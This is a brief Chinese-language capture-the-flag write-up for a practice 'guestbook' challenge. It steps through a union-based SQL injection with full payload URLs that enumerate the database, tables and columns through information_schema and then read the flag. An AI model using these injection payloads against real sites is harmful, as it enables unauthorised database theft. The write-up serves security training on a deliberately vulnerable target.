guestbook
题目提示:This guestbook sucks. sqlmap is your friend. 是sql注入
点击Message List 时是空的, 点击post是可以提交新信息,点击查看新信息
在id值后加上" ’ "测试是否存在测试点网页报错说明存在注入点
union 注入
查看列
https://hackme.inndy.tw/gb/?mod=read&id=-1%20union%20select%201,2,3,4%20#
//id=-1 是让前面的内容不显示
- 1
- 2
3被回显
1.查看数据库名
https://hackme.inndy.tw/gb/?mod=read&id=-1%20union%20select%201,2,database(),4%20#
- 1
数据库的名字g8
2.查看表名
https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 0,1),4#
- 1
发现有一个表 flag
3.测试表的字段
https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 1,1),4#
- 1
仍然显示flag
4.读取flag
https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select flag from flag limit 1,1),4#
- 1
得到flag